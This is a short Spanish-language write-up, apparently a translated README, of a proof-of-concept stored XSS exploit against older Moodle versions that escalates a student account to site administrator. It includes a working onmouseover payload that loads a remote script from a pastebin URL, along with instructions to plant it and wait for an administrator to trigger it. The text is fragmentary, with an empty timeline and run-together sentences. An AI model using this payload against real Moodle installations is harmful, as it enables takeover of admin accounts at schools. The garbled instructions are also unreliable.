
Moodle (< 3.6.2, < 3.5.4, < 3.4.7, < 3.1.16) PoC de XSS para escalada de privilegios (de estudiante a administrador)
Moodle (< 3.6.2, < 3.5.4, < 3.4.7, < 3.1.16) XSS PoC para escalada de privilegios (Estudiante a Admin). Este es uno de los errores pasados que descubrí durante un pentest anterior en una institución académica. Fue lo suficientemente exitoso en ese momento para prácticamente robar el acceso de administrador y obtener control total sobre Moodle usando solo un simple error.
Podemos ver en el historial de git que el error existía desde versiones antiguas de Moodle (2003) y se parcheó recién en 2019.
Cronología:
SOLO CON FINES EDUCATIVOS. NO USES EL EXPLOIT PARA ACTIVIDADES ILEGALES. EL AUTOR NO ES RESPONSABLE DE NINGÚN USO INDEBIDO O DAÑO.
userid por tu propio id. Supongamos que la URL es https://pastebin.com/raw/xxxxxxxx." style="position:fixed;height:100%;width:100%;top:0;left:0" onmouseover="x=document.createElement('script');x.src='https://pastebin.com/raw/xxxxxxxx';document.body.appendChild(x); alert('XSS')/userpix/ o coloca el enlace a esa página en tu publicación y espera.Si tiene éxito, tu cuenta se agregará como administrador.